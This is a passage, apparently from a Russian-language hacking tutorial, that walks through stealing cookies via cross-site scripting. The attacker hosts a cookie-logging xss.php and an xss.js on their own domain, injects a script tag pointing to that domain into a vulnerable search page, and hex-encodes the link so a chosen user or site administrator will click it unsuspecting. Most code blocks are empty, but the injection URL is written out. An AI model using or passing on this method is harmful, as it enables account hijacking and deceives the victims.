|
|||
Кодирование и декодирование ссылок3 Этап Теперь создадим еще один файл с любым названием, например, «xss. php» и напишем в нем: Код: Этот скрипт будет записывать дату и полученные cookie в файл cookies. txt 4 Этап После выполнения 2-го и 3-го этапа, загрузим созданные нами два файла в корень нашего сайта. Файлы должны быть доступны, например, по таким адресам: «http: //ВАШ_ДОМЕН/xss. js» и «http: //ВАШ_ДОМЕН/xss. php». 5 Этап Ну теперь самое сложное, найдем сайт с XSS уязвимостью, например, тут: «http: //site. ru/find. php? find=[xss]». Уязвимость обнаружили, теперь пошлем скрипту find. php следующий запрос: Код: и затем открываем созданный файл «cookies. txt» с украденными cookie. Кодирование и декодирование ссылок Для чего это нужно? По понятным причинам в открытую нашу ссылку кидать не стоит, слишком уж она бросается в глаза. Для повышения шанса нажатия по нашей ссылке мы ее закодируем, для этого создадим кодировщик и декодировщик. Кодировщик Создадим файл для кодирования символов в hex. Назовем файл, например, так «hex. php» и запишем в него следующий код: Код: Декодировщик: Ну а, чтобы вернуть ссылку в нормальный читабельный вид, напишем декодировщик, назовем его, например, «hex. php» и внесем следующий код: Код: Как это работает: Рассмотрим работу на наглядном примере. Для xss-атаки, нам нужно чтобы жертва перешла к примеру, по этой ссылке «http: //site. ru/find. php? find=< script src=http: //ВАШ_ДОМЕН/xss. js> < /script> », но как уже писалось ранее, в открытую ее кидать глупо, для этого мы и используем наш скрипт в файле «hex. php». Закодируем xss код из приведенной выше ссылки: Код: После чего, получим следующее hex представление: Код:
Теперь наша ссылка будет выглядеть вот так: Код: Как видно, теперь ссылка практически не вызывает подозрения, и выбранная жертва скорее всего на нее нажмет. Теперь осталось скинуть эту ссылку какому-нибудь пользователи или администратору сайта «site. ru» и дождаться его cookie, если конечно они там используются. Куки могут быть переданы в hex-виде, для этого придется воспользоваться декодером «unhex. php». Для большей скрытности, можем еще «xss. js», также пропустить через кодировщик «hex. php». Подведем итоги Теперь у нас с вами есть полноценные скрипты для проведения XSS-атак. Но нужно понимать, что данный метод атаки является довольно старым и найти эту уязвимость будет все сложнее и сложнее. Для современных CMS данный способ атаки будет бесполезным и подойдет скорее всего только для самописных кабинетов не опытных программистов.
|
|||
|